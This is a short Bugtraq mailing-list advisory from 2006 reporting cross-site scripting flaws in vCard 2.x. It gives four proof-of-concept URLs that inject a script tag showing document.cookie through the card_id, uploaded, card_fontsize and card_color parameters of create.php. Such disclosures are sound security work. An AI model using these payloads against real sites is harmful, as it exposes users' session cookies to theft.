Bugtraq mailing list archives

XSS in vCard


From: xx_hack_xx_2004 () hotmail com
Date: 11 Mar 2006 18:20:24 -0000

Hello
Vulnerable: vCard 2.x

http://www.belchiorfoundry.com

Exploit :
http://example.com/vcard/create.php?card_id=&apos;><script>alert(document.cookie)</script>

http://example.com/vcard/create.php?uploaded=&apos;><script>alert(document.cookie)</script>

http://example.com/vcard/create.php?card_fontsize=&apos;><script>alert(document.cookie)</script>

http://example.com/vcard/create.php?card_color=&apos;><script>alert(document.cookie)</script>

Discovery by Linux_Drox

http://www.lezr.com

Best Regards


Current thread: